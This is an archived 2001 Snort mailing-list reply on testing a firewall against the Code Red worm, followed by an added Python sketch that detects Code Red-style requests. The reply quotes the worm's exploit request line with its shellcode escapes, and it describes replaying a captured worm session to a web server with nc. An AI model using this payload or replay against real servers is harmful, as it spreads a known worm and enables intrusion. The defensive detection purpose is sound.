Snort mailing list archives
Re: Where to get " code red worm source" ?
From: Phil Wood <cpw () lanl gov>
Date: Wed, 29 Aug 2001 11:50:49 -0600
On Wed, Aug 29, 2001 at 01:44:33PM +0900, ls1100 wrote:
> I'd like to test my own Linux firewalls using iptables against the Code Red worm. Anybody know where to get "code red worm source"?
What I do is just run:

    tcpdump -s 1518 -w codeRed -c 100 dst net mynet and dst port 80

In less than a second, I have 5 examples. Each one has the following "string" among other things:

GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0

Since 8/13 we have had roughly 25+ million codereds. Today (last 11 hours and 39 minutes) we have had 878,589. I just don't see how you could miss getting one for yourself. %^)

I extracted one of the "sessions" in binary which you could pipe to a web server using nc.

--
Phil Wood, cpw () lanl gov
Attachment:
cr.bin
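
A detection-side sketch of the request pattern quoted in the message above, added here as an example (it is not part of the original post and is not Snort code): it flags GET requests for an `.ida` resource whose query string holds a long single-character filler run followed by `%uXXXX` escapes. The thresholds, function names and sample request lines are assumptions constructed for illustration, and the check accepts any filler character rather than only `X`.

```python
import re

MIN_FILLER = 100   # assumed threshold for the filler run; tune for your traffic
MIN_ESCAPES = 4    # assumed minimum number of %uXXXX escapes

REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")
UNICODE_ESCAPE = re.compile(r"%u[0-9a-fA-F]{4}")
REPEATED_CHAR = re.compile(r"(.)\1*")


def longest_run(text):
    """Length of the longest run of one repeated character in text."""
    return max((len(m.group(0)) for m in REPEATED_CHAR.finditer(text)), default=0)


def inspect_request(line):
    """Return (verdict, filler_len, escape_count) for one HTTP request line."""
    m = REQUEST_LINE.match(line.strip())
    if not m:
        return ("unparsed", 0, 0)
    method, target = m.groups()
    path, _, query = target.partition("?")
    # Compare the extension case-insensitively so /DEFAULT.IDA is not missed.
    if method != "GET" or not path.lower().endswith(".ida"):
        return ("other", 0, 0)
    filler = longest_run(query)
    escapes = len(UNICODE_ESCAPE.findall(query))
    if filler >= MIN_FILLER and escapes >= MIN_ESCAPES:
        return ("codered-like", filler, escapes)
    # A plain .ida request with an ordinary query is reported separately.
    return ("ida-request", filler, escapes)


# Constructed sample lines; the escape prefix is the one quoted in the post.
ESCAPES = "%u9090%u6858%ucbd3%u7801" * 3
SAMPLES = [
    "GET /default.ida?" + "X" * 224 + ESCAPES + "=a HTTP/1.0",
    "GET /DEFAULT.IDA?" + "N" * 224 + ESCAPES + "=a HTTP/1.0",
    "GET /search.ida?q=printers HTTP/1.0",
    "GET /index.html HTTP/1.1",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample), sample[:40])
```
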